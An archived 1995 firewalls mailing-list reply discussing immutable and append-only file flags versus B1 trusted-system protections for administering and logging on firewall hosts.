12 Aug 95 00:37:12 EDT Message-Id: <9508120437.AA10704@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: SunOS vs Solaris 2 vs Intel/BSD for firewalls To: steveg@cseic.saic.com (Stephen Harold Goldstein) Date: Sat, 12 Aug 1995 00:39:08 -0400 (EDT) Cc: firewalls@greatcircle.com In-Reply-To: <9508112030.AA22579@cseic.saic.com> from "Stephen Harold Goldstein" at Aug 11, 95 04:30:28 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Stephen Goldstein writes: > >How do they administer the system in mulituser mode? Presumably adding > >users and accounts and such would be disallowed. Also adding undesired > >services such as a telnetd or packet grabber would be disallowed. > > > >Ok then, no maintenance while in multi-user mode. Ouch! > > I thought we were discussing the benefits of immutable flags for use > in securing Firewall boxes. In that context, there are (or should be) > no user accounts that might require administration in multi-user mode. > Further, I see the requirement of going to single user mode before the > configuration can be changed as a real plus. Oops, I didn't mean to add useradm to the list (although hardened servers are more capable of supporting user accounts safely). The administration that I meant to refer to is that of the firewall itself, ie, what types of services to allow. This immutable file concept kicks in at multiuser mode, which means that the most important files get locked down while the system is multiuser. On the surface that sounds good. But going single user means that all services have to stop everytime you make a change. If your firewall is in a production environment, that's not always a good idea. Also you have to reboot the system to get back to an administratable run level, so you might be down for a considerable time to make a trivial change. Also, remote administration will be more difficult in single user mode, although some products do attempt solutions there. The real plus is being able to change the configuration in a secure manner. There are better ways to do that than relying on immutable files. One way is to use B1 to protect all configuration data and binaries from user processes such as proxies and such. This type of protection allows you to change them while the system is in multiuser mode. If you want to, you can even limit the access to these files to a session that has to start on the console. On the other hand you could allow an administrative session to begin only from a trusted interface connected to only a few machines and otherwise inaccessible. That's more of a risk but some would choose to make that tradeoff. I like the idea of an append-only flag which bsd offers. That makes sense for log files and such as long as they don't grow to large. But if you run out of space, you'll have to reboot to archive and truncate the log files. In our B1 system, regular processes cannot read/write/truncate/append or even see the log files. Logging information can be written in an append only fashion to a special device file similar to /dev/log, that records the date/time/pid of the writer along with the data. On an immutable system, recording the log file over the net via syslogd may make more sense. Don't mean to drone on here. Just hate to see the lack of interest in B level systems when they have so much to offer as hosts for firewalls. Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Fri Aug 11 23:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA13008 for firewalls-outgoing; Fri, 11 Aug 1995 22:37:57 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA12971 for